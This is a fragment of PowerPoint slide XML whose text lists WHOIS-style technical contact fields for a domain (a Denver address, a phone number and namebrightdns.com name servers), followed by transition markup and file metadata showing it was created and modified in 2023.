            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Street: 2635 Walnut Street</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech City: Denver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech State/Province: CO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Postal Code: 80205</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Country: US</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Phone: +1.3038930552</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Phone Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Fax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Fax Ext:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Tech Email:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Name Server: nsg1.namebrightdns.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51856B0F-DF25-F7C0-533E-AFDC393873F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="8769350"/>
            <a:ext cx="444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a:t>Name Server: nsg2.namebrightdns.com</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fallOver"/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId2" name="arrow.wav"/>
          </p:stSnd>
        </p:sndAc>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition>
        <p:fade/>
        <p:sndAc>
          <p:stSnd>
            <p:snd r:embed="rId3" name="arrow.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ppt-by-karri-charishma (1)</Template>
  <TotalTime>106</TotalTime>
  <Words>4669</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>330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Black</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paridala saisrija</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>JASWANTH J</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-27T07:25:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-03T10:08:52Z</dcterms:modified>
</cp:coreProperties>
</file>